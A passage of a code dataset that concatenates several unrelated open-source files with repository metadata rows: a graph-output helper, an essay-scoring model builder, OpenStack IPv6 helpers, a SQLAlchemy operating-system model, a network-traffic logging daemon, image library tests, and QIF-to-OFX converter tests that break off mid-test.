QQ = zeros((numMacro,numMacro))
for i in range(0,numMacro):
for j in range(0,numMacro):
QQ[i,j]=(X[ix_(idX[i],idX[j])].sum())
QQ[j,i]=QQ[i,j]
D = QQ.sum(axis=1)
Q = (diag(diag(1./D)*QQ)).sum()
return(Q)
def hiscMacro(arr): #Wrapper to Emulate matlab's --hisc-- function that counts the number of elements per class in a histogram
hisc=zeros((max(arr)), int)
for i in (arr):
hisc[i-1]+=1
return (hisc)
def writeFlowGraph(cptGradFlow, nodeInfoLevel, nodeInfoLevelSize, nodeInfoSet, nodeInfoFilter, levelIdx, superLevels, outFlowGraphName, pLevels):
print "(OUTPUT) ", ("---- Generating Macrostate flowgraph ---")
# print "(DEBUG) ", scipy.linalg.norm(cptGradFlow - (cptGradFlow.conj().T))
if ( scipy.linalg.norm(cptGradFlow - (cptGradFlow.conj().T))==0 ):
print "(OUTPUT) ", ("error: Input graph is UNDIRECTED! I CANNOT GENERATE THE FLOW GRAPHIC!")
return
numNodes = max(shape(cptGradFlow))
colorParam=[]
sizeParam=[]
for i in range(len(nodeInfoLevel)):
colorParam.append(len(superLevels[1]) - nodeInfoFilter[i] - 1 )
sizeParam.append(100.0*len(nodeInfoSet[i])/nodeInfoLevelSize[i])
# printDebug(sizeParam, "sizeParam")
maxColorParam=max(colorParam)
colorScaleORI = arange(0.0,1.1,0.1)
colorScaleNEW = arange(0.3,.91,0.06)
print colorScaleORI, colorScaleNEW
colorInterpolator = interp1d(colorScaleORI,colorScaleNEW)
for i in range(numNodes):
colorParam[i]= colorInterpolator(float(colorParam[i])/maxColorParam)
# printDebug(colorParam, "colorParam")
sParam = np.copy(sizeParam)
levelColor = []
cm = get_cmap('jet')
for i in range(numNodes):
tmpColor=cm(colorParam[i]) # color will now be an RGBA tuple, THX internet
levelColor.append([int(tmpColor[0]*255),int(tmpColor[1]*255),int(tmpColor[2]*255),int(tmpColor[3]*255)])
for i in range(len(sizeParam)):
sizeParam[i] = 0.1 + sizeParam[i]/max(sizeParam)
outline = 'digraph "G" {\n'
for i in range(numNodes):
outline += ' node%d [label="%d:%2.0f%%", color="#%02x%02x%02x%02x",style=filled, shape=circle, width=%0.2f];\n' % (i, i, sParam[i], levelColor[i][0],levelColor[i][1],levelColor[i][2],levelColor[i][3], sizeParam[i])
# printDebug(cptGradFlow, "cptGradFlow")
for i in range(numNodes):
connNodes = where(cptGradFlow[:,i] > 0)[0]
for j in range(size(connNodes)):
outline += ' node%d -> node%d [label="%d"];\n' % (i, connNodes[0, j],cptGradFlow[connNodes[0,j],i])
levelSizes=[]
for i in range(len(superLevels[1])):
levelSizes.append(len(superLevels[0][i]))
levelSizeInfo = ""
for i in levelSizes:
levelSizeInfo += '%d; ' % i;
l=zeros((len(levelIdx)), int)
for i in range (len(levelIdx)):
l[i] = len(levelIdx[i])
l_end = l.cumsum(axis=0)
tmpNextLevIdxInfo=0
levelIdxInfo=""
for i in range(0,len(l_end)-1):
levelIdxInfo += "%d-%d; " % (tmpNextLevIdxInfo, l_end[i]-1)
tmpNextLevIdxInfo=l_end[i]
levelIdxInfo += "%d-%d; " % (tmpNextLevIdxInfo, l_end[len(l_end)-1])
levelDesity=""
for i in pLevels:
levelDesity += "%2.0f%%; " % (i*100.0)
outline += ' label = " Levels: %d \\l Density Levels: %s \\l Level Sizes: %s \\l Node Index: %s \\l\n' % (len(superLevels[1]), levelDesity, levelSizeInfo, levelIdxInfo)
outline += ' labelloc="b";\nlabeljust="l";\n'
outline += ' center = 1;\n overlap=scale;\n'
outline +='}'
print "(OUTPUT) ", ("Writting Macrostate flowgraph to: %s" % outFlowGraphName)
f = open(outFlowGraphName,'w')
print >>f, outline
f.close()
print "(OUTPUT) ", ("Macrostate flowgraph generated")
return
def printDebug(obj, message):
outline= ("(DEBUG) %s: " % message)
try:
for i in obj:
outline += ", " + str(i)
except TypeError:
outline += " " + str(obj)
print outline.replace("\n", " ")
if __name__ == '__main__':
main()
| apache-2.0 | -28,220,316,076,639,290 | 36.912297 | 229 | 0.655434 | false |
edx/ease | ease/model_creator.py | 1 | 7903 | #Provides interface functions to create and save models
import numpy
import re
import nltk
import sys
from sklearn.feature_extraction.text import CountVectorizer
import pickle
import os
import sklearn.ensemble
from itertools import chain
base_path = os.path.dirname(__file__)
sys.path.append(base_path)
from .essay_set import EssaySet
from . import util_functions
from . import feature_extractor
import logging
from . import predictor_extractor
log=logging.getLogger()
def read_in_test_data(filename):
"""
Reads in test data file found at filename.
filename must be a tab delimited file with columns id, dummy number column, score, dummy score, text
returns the score and the text
"""
tid, e_set, score, score2, text = [], [], [], [], []
combined_raw = open(filename).read()
raw_lines = combined_raw.splitlines()
for row in range(1, len(raw_lines)):
tid1, set1, score1, score12, text1 = raw_lines[row].strip().split("\t")
tid.append(int(tid1))
text.append(text1)
e_set.append(int(set1))
score.append(int(score1))
score2.append(int(score12))
return score, text
def read_in_test_prompt(filename):
"""
Reads in the prompt from a text file
Returns string
"""
prompt_string = open(filename).read()
return prompt_string
def read_in_test_data_twocolumn(filename,sep=","):
"""
Reads in a two column version of the test data.
Filename must point to a delimited file.
In filename, the first column should be integer score data.
The second column should be string text data.
Sep specifies the type of separator between fields.
"""
score, text = [], []
combined_raw = open(filename).read()
raw_lines = combined_raw.splitlines()
for row in range(1, len(raw_lines)):
        # honour the requested separator instead of always splitting on tabs
        score1, text1 = raw_lines[row].strip().split(sep)
text.append(text1)
score.append(int(score1))
return score, text
def create_essay_set(text, score, prompt_string, generate_additional=True):
"""
Creates an essay set from given data.
Text should be a list of strings corresponding to essay text.
Score should be a list of scores where score[n] corresponds to text[n]
Prompt string is just a string containing the essay prompt.
Generate_additional indicates whether to generate additional essays at the minimum score point or not.
"""
x = EssaySet()
for i in range(0, len(text)):
x.add_essay(text[i], score[i])
if score[i] == min(score) and generate_additional == True:
x.generate_additional_essays(x._clean_text[len(x._clean_text) - 1], score[i])
x.update_prompt(prompt_string)
return x
def get_cv_error(clf,feats,scores):
"""
Gets cross validated error for a given classifier, set of features, and scores
clf - classifier
feats - features to feed into the classified and cross validate over
scores - scores associated with the features -- feature row 1 associates with score 1, etc.
"""
results={'success' : False, 'kappa' : 0, 'mae' : 0}
try:
cv_preds=util_functions.gen_cv_preds(clf,feats,scores)
err=numpy.mean(numpy.abs(numpy.array(cv_preds)-scores))
kappa=util_functions.quadratic_weighted_kappa(list(cv_preds),scores)
results['mae']=err
results['kappa']=kappa
results['success']=True
except ValueError as ex:
# If this is hit, everything is fine. It is hard to explain why the error occurs, but it isn't a big deal.
msg = u"Not enough classes (0,1,etc) in each cross validation fold: {ex}".format(ex=ex)
log.debug(msg)
except:
log.exception("Error getting cv error estimates.")
return results
def get_algorithms(algorithm):
"""
Gets two classifiers for each type of algorithm, and returns them. First for predicting, second for cv error.
type - one of util_functions.AlgorithmTypes
"""
if algorithm == util_functions.AlgorithmTypes.classification:
clf = sklearn.ensemble.GradientBoostingClassifier(n_estimators=100, learning_rate=.05,
max_depth=4, random_state=1,min_samples_leaf=3)
clf2=sklearn.ensemble.GradientBoostingClassifier(n_estimators=100, learning_rate=.05,
max_depth=4, random_state=1,min_samples_leaf=3)
else:
clf = sklearn.ensemble.GradientBoostingRegressor(n_estimators=100, learning_rate=.05,
max_depth=4, random_state=1,min_samples_leaf=3)
clf2=sklearn.ensemble.GradientBoostingRegressor(n_estimators=100, learning_rate=.05,
max_depth=4, random_state=1,min_samples_leaf=3)
return clf, clf2
def extract_features_and_generate_model_predictors(predictor_set, algorithm=util_functions.AlgorithmTypes.regression):
"""
Extracts features and generates predictors based on a given predictor set
predictor_set - a PredictorSet object that has been initialized with data
type - one of util_functions.AlgorithmType
"""
if(algorithm not in [util_functions.AlgorithmTypes.regression, util_functions.AlgorithmTypes.classification]):
algorithm = util_functions.AlgorithmTypes.regression
f = predictor_extractor.PredictorExtractor()
f.initialize_dictionaries(predictor_set)
train_feats = f.gen_feats(predictor_set)
clf,clf2 = get_algorithms(algorithm)
cv_error_results=get_cv_error(clf2,train_feats,predictor_set._target)
try:
set_score = numpy.asarray(predictor_set._target, dtype=numpy.int)
clf.fit(train_feats, set_score)
except ValueError:
log.exception("Not enough classes (0,1,etc) in sample.")
set_score = predictor_set._target
set_score[0]=1
set_score[1]=0
clf.fit(train_feats, set_score)
return f, clf, cv_error_results
def extract_features_and_generate_model(essays, algorithm=util_functions.AlgorithmTypes.regression):
"""
Feed in an essay set to get feature vector and classifier
essays must be an essay set object
additional array is an optional argument that can specify
a numpy array of values to add in
returns a trained FeatureExtractor object and a trained classifier
"""
f = feature_extractor.FeatureExtractor()
f.initialize_dictionaries(essays)
train_feats = f.gen_feats(essays)
set_score = numpy.asarray(essays._score, dtype=numpy.int)
if len(util_functions.f7(list(set_score)))>5:
algorithm = util_functions.AlgorithmTypes.regression
else:
algorithm = util_functions.AlgorithmTypes.classification
clf,clf2 = get_algorithms(algorithm)
cv_error_results=get_cv_error(clf2,train_feats,essays._score)
try:
clf.fit(train_feats, set_score)
except ValueError:
log.exception("Not enough classes (0,1,etc) in sample.")
set_score[0]=1
set_score[1]=0
clf.fit(train_feats, set_score)
return f, clf, cv_error_results
def dump_model_to_file(prompt_string, feature_ext, classifier, text, score, model_path):
"""
Writes out a model to a file.
prompt string is a string containing the prompt
feature_ext is a trained FeatureExtractor object
classifier is a trained classifier
model_path is the path of write out the model file to
"""
model_file = {'prompt': prompt_string, 'extractor': feature_ext, 'model': classifier, 'text' : text, 'score' : score}
pickle.dump(model_file, file=open(model_path, "w"))
def create_essay_set_and_dump_model(text,score,prompt,model_path,additional_array=None):
"""
Function that creates essay set, extracts features, and writes out model
See above functions for argument descriptions
"""
    essay_set = create_essay_set(text, score, prompt)
    feature_ext, clf, cv_error_results = extract_features_and_generate_model(essay_set)
    dump_model_to_file(prompt, feature_ext, clf, text, score, model_path)
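# Illustrative end-to-end usage (added sketch, not part of the original module; the file names
# below are placeholders):
#
#   score, text = read_in_test_data_twocolumn("training_data.tsv", sep="\t")
#   prompt = read_in_test_prompt("prompt.txt")
#   essays = create_essay_set(text, score, prompt)
#   feature_ext, clf, cv_error = extract_features_and_generate_model(essays)
#   dump_model_to_file(prompt, feature_ext, clf, text, score, "model.p")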
| agpl-3.0 | 8,545,315,089,119,740,000 | 35.75814 | 121 | 0.690118 | false |
russellb/nova | nova/ipv6/api.py | 1 | 1342 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2011 Openstack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova import flags
from nova.openstack.common import cfg
from nova import utils
ipv6_backend_opt = cfg.StrOpt('ipv6_backend',
default='rfc2462',
help='Backend to use for IPv6 generation')
FLAGS = flags.FLAGS
FLAGS.register_opt(ipv6_backend_opt)
def reset_backend():
global IMPL
IMPL = utils.LazyPluggable('ipv6_backend',
rfc2462='nova.ipv6.rfc2462',
account_identifier='nova.ipv6.account_identifier')
def to_global(prefix, mac, project_id):
return IMPL.to_global(prefix, mac, project_id)
def to_mac(ipv6_address):
return IMPL.to_mac(ipv6_address)
reset_backend()
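# Illustrative usage (added note; the prefix, MAC and project id below are made-up values):
#   ipv6_addr = to_global('2001:db8::/64', '02:16:3e:33:44:55', 'project-1')
#   mac = to_mac(ipv6_addr)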
| apache-2.0 | 3,333,885,616,564,730,000 | 29.5 | 78 | 0.682563 | false |
guillaume-philippon/aquilon | lib/aquilon/aqdb/model/operating_system.py | 1 | 2257 | # -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-
# ex: set expandtab softtabstop=4 shiftwidth=4:
#
# Copyright (C) 2009,2010,2011,2012,2013,2014,2016 Contributor
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Operating System as a high level cfg object """
from datetime import datetime
from sqlalchemy import (Column, Integer, DateTime, Sequence, String, ForeignKey,
UniqueConstraint)
from sqlalchemy.orm import relation, deferred
from aquilon.aqdb.model import Base, Archetype, AssetLifecycle
from aquilon.aqdb.column_types.aqstr import AqStr
_TN = 'operating_system'
class OperatingSystem(Base):
""" Operating Systems """
__tablename__ = _TN
_class_label = 'Operating System'
id = Column(Integer, Sequence('%s_id_seq' % _TN), primary_key=True)
name = Column(AqStr(32), nullable=False)
version = Column(AqStr(16), nullable=False)
archetype_id = Column(ForeignKey(Archetype.id, ondelete="CASCADE"),
nullable=False)
creation_date = deferred(Column(DateTime, default=datetime.now,
nullable=False))
comments = Column(String(255), nullable=True)
lifecycle_id = Column(ForeignKey(AssetLifecycle.id), nullable=False)
archetype = relation(Archetype, lazy=False, innerjoin=True)
lifecycle = relation(AssetLifecycle, innerjoin=True)
__table_args__ = (UniqueConstraint(archetype_id, name, version),
{'info': {'unique_fields': ['name', 'version',
'archetype']}})
def __format__(self, format_spec):
instance = "%s/%s-%s" % (self.archetype.name, self.name, self.version)
return self.format_helper(format_spec, instance)
| apache-2.0 | -5,904,684,791,283,177,000 | 39.303571 | 80 | 0.673017 | false |
CaliOpen/CaliOpen | src/backend/tools/py.CLI/caliopen_cli/commands/dump_indexes_mappings.py | 1 | 1108 | import json
from caliopen_storage.helpers.json import JSONEncoder
def dump_indexes(**kwargs):
# Discover base core classes
from caliopen_main.user.core import User
from caliopen_main.contact.objects.contact import Contact
from caliopen_main.message.objects.message import Message
from caliopen_main.common.objects.tag import ResourceTag
from caliopen_storage.core import core_registry
_exports = {
'contact': ['Contact'],
'message': ['Message'],
}
for keys in _exports:
for obj in _exports[keys]:
kls = core_registry.get(obj)
if not kls:
raise Exception('core class %s not found in registry' % obj)
output_file = '%s/%s.json' % (kwargs["output_path"], obj.lower())
dump_index_mapping(kls._index_class, output_file)
def dump_index_mapping(kls, output_file):
"""Output the json definition class."""
m = kls.build_mapping().to_dict()
with open(output_file, 'w') as f:
f.write(json.dumps(m, cls=JSONEncoder,
indent=4, sort_keys=True))
| gpl-3.0 | -7,902,594,706,566,011,000 | 34.741935 | 77 | 0.631769 | false |
Mausy5043/bonediagd | daemon13.py | 1 | 4546 | #!/usr/bin/env python
# Based on previous work by
# Charles Menguy (see: http://stackoverflow.com/questions/10217067/implementing-a-full-python-unix-style-daemon-process)
# and Sander Marechal (see: http://www.jejik.com/articles/2007/02/a_simple_unix_linux_daemon_in_python/)
# Adapted by M.Hendrix [2015]
# daemon13.py measures the network traffic.
# These are all counters, therefore no averaging is needed.
import syslog, traceback
import os, sys, time, math
from libdaemon import Daemon
import ConfigParser
DEBUG = False
IS_SYSTEMD = os.path.isfile('/bin/journalctl')
leaf = os.path.realpath(__file__).split('/')[-2]
class MyDaemon(Daemon):
def run(self):
iniconf = ConfigParser.ConfigParser()
inisection = "13"
home = os.path.expanduser('~')
s = iniconf.read(home + '/' + leaf + '/config.ini')
if DEBUG: print "config file : ", s
if DEBUG: print iniconf.items(inisection)
reportTime = iniconf.getint(inisection, "reporttime")
cycles = iniconf.getint(inisection, "cycles")
samplesperCycle = iniconf.getint(inisection, "samplespercycle")
flock = iniconf.get(inisection, "lockfile")
fdata = iniconf.get(inisection, "resultfile")
samples = samplesperCycle * cycles # total number of samples averaged
sampleTime = reportTime/samplesperCycle # time [s] between samples
cycleTime = samples * sampleTime # time [s] per cycle
data = [] # array for holding sampledata
while True:
try:
startTime = time.time()
result = do_work().split(',')
data = map(int, result)
# report sample average
if (startTime % reportTime < sampleTime):
if DEBUG:print data
averages = data
#averages = sum(data[:]) / len(data)
#if DEBUG:print averages
do_report(averages, flock, fdata)
waitTime = sampleTime - (time.time() - startTime) - (startTime%sampleTime)
if (waitTime > 0):
if DEBUG:print "Waiting {0} s".format(waitTime)
time.sleep(waitTime)
except Exception as e:
if DEBUG:
print "Unexpected error:"
print e.message
syslog.syslog(syslog.LOG_ALERT,e.__doc__)
syslog_trace(traceback.format_exc())
raise
def syslog_trace(trace):
# Log a python stack trace to syslog
log_lines = trace.split('\n')
for line in log_lines:
if line:
syslog.syslog(syslog.LOG_ALERT,line)
def cat(filename):
ret = ""
if os.path.isfile(filename):
with open(filename,'r') as f:
ret = f.read().strip('\n')
return ret
def do_work():
# 6 #datapoints gathered here
# Network traffic
wlIn = 0
wlOut = 0
etIn = 0
etOut = 0
loIn = 0
loOut = 0
list = cat("/proc/net/dev").replace(":"," ").splitlines()
for line in range(2,len(list)):
device = list[line].split()[0]
if device == "lo":
loIn = int(list[line].split()[1])
loOut = int(list[line].split()[9])
if device == "eth0":
etIn = int(list[line].split()[1])
etOut = int(list[line].split()[9])
if device == "wlan0":
wlIn = int(list[line].split()[1])
wlOut = int(list[line].split()[9])
if device == "wlan1":
wlIn += int(list[line].split()[1])
wlOut += int(list[line].split()[9])
return '{0}, {1}, {2}, {3}, {4}, {5}'.format(loIn, loOut, etIn, etOut, wlIn, wlOut)
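# Illustrative return value of do_work() (hypothetical counter readings):
#   "1234, 1234, 567890, 123456, 0, 0"
# i.e. the loIn, loOut, etIn, etOut, wlIn and wlOut byte counters parsed from
# /proc/net/dev.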
def do_report(result, flock, fdata):
# Get the time and date in human-readable form and UN*X-epoch...
outDate = time.strftime('%Y-%m-%dT%H:%M:%S, %s')
result = ', '.join(map(str, result))
lock(flock)
with open(fdata, 'a') as f:
f.write('{0}, {1}\n'.format(outDate, result) )
unlock(flock)
def lock(fname):
open(fname, 'a').close()
def unlock(fname):
if os.path.isfile(fname):
os.remove(fname)
if __name__ == "__main__":
daemon = MyDaemon('/tmp/' + leaf + '/13.pid')
if len(sys.argv) == 2:
if 'start' == sys.argv[1]:
daemon.start()
elif 'stop' == sys.argv[1]:
daemon.stop()
elif 'restart' == sys.argv[1]:
daemon.restart()
elif 'foreground' == sys.argv[1]:
# assist with debugging.
print "Debug-mode started. Use <Ctrl>+C to stop."
DEBUG = True
if DEBUG:
logtext = "Daemon logging is ON"
syslog.syslog(syslog.LOG_DEBUG, logtext)
daemon.run()
else:
print "Unknown command"
sys.exit(2)
sys.exit(0)
else:
print "usage: {0!s} start|stop|restart|foreground".format(sys.argv[0])
sys.exit(2)
| mit | -1,613,244,532,009,783,600 | 29.510067 | 120 | 0.604707 | false |
grigorisg9gr/menpo | menpo/image/test/image_basics_test.py | 1 | 4345 | import warnings
import numpy as np
from numpy.testing import assert_allclose
from nose.tools import raises
from pathlib import Path
import menpo
from menpo.image import Image, MaskedImage, BooleanImage
from menpo.shape import PointCloud
from menpo.transform import UniformScale, Translation
def test_image_as_masked():
img = Image(np.random.rand(3, 3, 1), copy=False)
m_img = img.as_masked()
assert(type(m_img) == MaskedImage)
assert_allclose(m_img.pixels, img.pixels)
def test_image_has_nan_values():
img = Image(np.random.rand(1, 3, 3), copy=False)
img.pixels[0, 0, 0] = np.nan
assert img.has_nan_values()
def test_image_no_nan_values():
img = Image(np.random.rand(1, 3, 3), copy=False)
assert not img.has_nan_values()
def test_masked_image_as_unmasked():
m_img = MaskedImage(np.random.rand(1, 3, 3), copy=False)
img = m_img.as_unmasked()
assert(type(img) == Image)
assert_allclose(m_img.pixels, img.pixels)
def test_masked_image_as_unmasked_fill():
m_img = MaskedImage(np.random.rand(1, 3, 3), copy=False)
m_img.mask.pixels[0, 0, 0] = False
img = m_img.as_unmasked(fill=8)
assert(type(img) == Image)
assert_allclose(m_img.pixels[0, 1:, 1:], img.pixels[0, 1:, 1:])
assert_allclose(img.pixels[0, 0, 0], 8.0)
def test_masked_image_as_unmasked_fill_tuple():
m_img = MaskedImage(np.random.rand(3, 3, 3), copy=False)
m_img.mask.pixels[0, 0, 0] = False
img = m_img.as_unmasked(fill=(1, 2, 3))
assert(type(img) == Image)
assert_allclose(m_img.pixels[0, 1:, 1:], img.pixels[0, 1:, 1:])
assert_allclose(img.pixels[:, 0, 0], (1, 2, 3))
@raises(NotImplementedError)
def test_boolean_image_as_masked_raises_not_implemented_error():
b_img = BooleanImage.init_blank((4, 5))
b_img.as_masked()
def test_warp_to_shape_preserves_path():
bb = menpo.io.import_builtin_asset.breakingbad_jpg()
bb2 = bb.rescale(0.1)
assert hasattr(bb2, 'path')
assert bb2.path == bb.path
def test_warp_to_mask_preserves_path():
bb = menpo.io.import_builtin_asset.breakingbad_jpg()
no_op = UniformScale(1.0, n_dims=2)
bb2 = bb.warp_to_mask(BooleanImage.init_blank((10, 10)), no_op)
assert hasattr(bb2, 'path')
assert bb2.path == bb.path
def test_warp_to_shape_boolean_preserves_path():
i1 = BooleanImage.init_blank((10, 10))
i1.path = Path('.')
i2 = i1.rescale(0.8)
assert hasattr(i2, 'path')
assert i2.path == i1.path
def test_init_from_rolled_channels():
p = np.empty([50, 60, 3])
im = Image.init_from_channels_at_back(p)
assert im.n_channels == 3
assert im.height == 50
assert im.width == 60
def test_init_from_channels_at_back_less_dimensions():
p = np.empty([50, 60])
im = Image.init_from_channels_at_back(p)
assert im.n_channels == 1
assert im.height == 50
assert im.width == 60
def test_init_from_pointcloud():
pc = PointCloud.init_2d_grid((10, 10))
im = Image.init_from_pointcloud(pc)
assert im.shape == (9, 9)
def test_init_from_pointcloud_return_transform():
correct_tr = Translation([5, 5])
pc = correct_tr.apply(PointCloud.init_2d_grid((10, 10)))
im, tr = Image.init_from_pointcloud(pc, return_transform=True)
assert im.shape == (9, 9)
assert_allclose(tr.as_vector(), -correct_tr.as_vector())
def test_init_from_pointcloud_attach_group():
pc = PointCloud.init_2d_grid((10, 10))
im = Image.init_from_pointcloud(pc, group='test')
assert im.shape == (9, 9)
assert im.n_landmark_groups == 1
def test_init_from_pointcloud_boundary():
pc = PointCloud.init_2d_grid((10, 10))
im = Image.init_from_pointcloud(pc, boundary=5)
print(im.shape)
assert im.shape == (19, 19)
def test_bounds_2d():
im = Image.init_blank((50, 30))
assert_allclose(im.bounds(), ((0, 0), (49, 29)))
def test_bounds_3d():
im = Image.init_blank((50, 30, 10))
assert_allclose(im.bounds(), ((0, 0, 0), (49, 29, 9)))
def test_constrain_landmarks_to_bounds():
im = Image.init_blank((10, 10))
im.landmarks['test'] = PointCloud.init_2d_grid((20, 20))
with warnings.catch_warnings():
warnings.simplefilter('ignore')
im.constrain_landmarks_to_bounds()
assert not im.has_landmarks_outside_bounds()
assert_allclose(im.landmarks['test'].bounds(), im.bounds())
| bsd-3-clause | -8,169,848,640,593,623,000 | 28.557823 | 67 | 0.650403 | false |
myfreecomm/fixofx | test/ofxtools_qif_converter.py | 1 | 9183 | # Copyright 2005-2010 Wesabe, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
sys.path.insert(0, '../3rdparty')
sys.path.insert(0, '../lib')
import ofxtools
import textwrap
import unittest
from pyparsing import ParseException
from time import localtime, strftime
class QifConverterTests(unittest.TestCase):
def test_bank_stmttype(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D01/13/2005
^
''')
converter = ofxtools.QifConverter(qiftext)
self.assertEqual(converter.accttype, "CHECKING")
def test_ccard_stmttype(self):
qiftext = textwrap.dedent('''\
!Type:CCard
D01/13/2005
^
''')
converter = ofxtools.QifConverter(qiftext)
self.assertEqual(converter.accttype, "CREDITCARD")
def test_no_stmttype(self):
qiftext = textwrap.dedent('''\
D01/13/2005
^
''')
converter = ofxtools.QifConverter(qiftext)
self.assertEqual(converter.accttype, "CHECKING")
def test_no_txns(self):
qiftext = textwrap.dedent('''\
!Type:Bank
''')
today = strftime("%Y%m%d", localtime())
converter = ofxtools.QifConverter(qiftext)
self.assertEqual(converter.start_date, today)
self.assertEqual(converter.end_date, today)
def test_us_date(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D01/13/2005
^
''')
converter = ofxtools.QifConverter(qiftext)
self.assertTrue(converter.txns_by_date.has_key("20050113"))
def test_uk_date(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D13/01/2005
^
''')
converter = ofxtools.QifConverter(qiftext)
self.assertTrue(converter.txns_by_date.has_key("20050113"))
def test_ambiguous_date(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D12/01/2005
^
''')
converter = ofxtools.QifConverter(qiftext)
self.assertTrue(converter.txns_by_date.has_key("20051201"))
def test_mixed_us_dates(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D01/12/2005
^
D01/13/2005
^
''')
converter = ofxtools.QifConverter(qiftext)
self.assertTrue(converter.txns_by_date.has_key("20050112"))
self.assertTrue(converter.txns_by_date.has_key("20050113"))
def test_mixed_uk_dates(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D12/01/2005
^
D13/01/2005
^
''')
converter = ofxtools.QifConverter(qiftext)
self.assertTrue(converter.txns_by_date.has_key("20050112"))
self.assertTrue(converter.txns_by_date.has_key("20050113"))
def test_slashfree_date(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D12012005
^
''')
converter = ofxtools.QifConverter(qiftext)
self.assertTrue(converter.txns_by_date.has_key("20051201"))
def test_unparseable_date(self):
qiftext = textwrap.dedent('''\
!Type:Bank
DFnargle
^
''')
self.assertRaises(ValueError, ofxtools.QifConverter, qiftext)
def test_len_eight_no_int_date(self):
qiftext = textwrap.dedent('''\
!Type:Bank
DAAAAAAAA
^
''')
self.assertRaises(ValueError, ofxtools.QifConverter, qiftext)
def test_asc_dates(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D01/13/2005
^
D01/27/2005
^
D02/01/2005
^
D02/01/2005
^
D02/13/2005
^
''')
converter = ofxtools.QifConverter(qiftext)
self.assertEqual(converter.start_date, "20050113")
self.assertEqual(converter.end_date, "20050213")
self.assertEqual(len(converter.txns_by_date.keys()), 4)
def test_desc_dates(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D02/13/2005
^
D02/01/2005
^
D02/01/2005
^
D01/27/2005
^
D01/13/2005
^
''')
converter = ofxtools.QifConverter(qiftext)
self.assertEqual(converter.start_date, "20050113")
self.assertEqual(converter.end_date, "20050213")
self.assertEqual(len(converter.txns_by_date.keys()), 4)
def test_mixed_dates(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D02/01/2005
^
D02/13/2005
^
D01/13/2005
^
D02/01/2005
^
D01/27/2005
^
''')
converter = ofxtools.QifConverter(qiftext)
self.assertEqual(converter.start_date, "20050113")
self.assertEqual(converter.end_date, "20050213")
self.assertEqual(len(converter.txns_by_date.keys()), 4)
def test_default_currency(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D01/25/2007
T417.93
^
''')
converter = ofxtools.QifConverter(qiftext)
ofx102 = converter.to_ofx102()
self.assertTrue(ofx102.find('<CURDEF>USD') != -1)
def test_found_currency(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D01/25/2007
T417.93
^EUR
''')
converter = ofxtools.QifConverter(qiftext)
ofx102 = converter.to_ofx102()
self.assertTrue(ofx102.find('<CURDEF>EUR') != -1)
def test_explicit_currency(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D01/25/2007
T417.93
^
''')
converter = ofxtools.QifConverter(qiftext, curdef='GBP')
ofx102 = converter.to_ofx102()
self.assertTrue(ofx102.find('<CURDEF>GBP') != -1)
def test_amount2(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D02/01/2005
U25.42
^
''')
converter = ofxtools.QifConverter(qiftext)
txn = converter.txns_by_date["20050201"][0]
self.assertEqual(txn["Amount"], "25.42")
def test_bad_amount_precision(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D01/25/2007
T417.930
^
''')
converter = ofxtools.QifConverter(qiftext)
txn = converter.txns_by_date["20070125"][0]
self.assertEqual(txn["Amount"], "417.93")
def test_dash_amount(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D02/01/2005
T25.42
^
D02/01/2005
T-
^
''')
converter = ofxtools.QifConverter(qiftext)
txn_list = converter.txns_by_date["20050201"]
self.assertEqual(len(txn_list), 1)
txn = txn_list[0]
self.assertEqual(txn["Amount"], "25.42")
def test_trailing_minus(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D08/06/2008
T26.24-
^
''')
converter = ofxtools.QifConverter(qiftext)
txn = converter.txns_by_date["20080806"][0]
self.assertEqual(txn["Amount"], "-26.24")
def test_n_a_number(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D01/25/2007
T417.93
NN/A
^
''')
converter = ofxtools.QifConverter(qiftext)
txn = converter.txns_by_date["20070125"][0]
self.assertEqual(txn.has_key("Number"), False)
def test_creditcard_number(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D01/25/2007
T417.93
NXXXX-XXXX-XXXX-1234
^
''')
converter = ofxtools.QifConverter(qiftext)
txn = converter.txns_by_date["20070125"][0]
self.assertEqual(txn.has_key("Number"), False)
def test_creditcard_stmt_number(self):
qiftext = textwrap.dedent('''\
!Type:CCard
D01/25/2007
T417.93
N1234
^
''')
converter = ofxtools.QifConverter(qiftext)
txn = converter.txns_by_date["20070125"][0]
self.assertEqual(txn.has_key("Number"), False)
def test_check_stmt_number(self):
qiftext = textwrap.dedent('''\
!Type:Bank
D01/25/2007
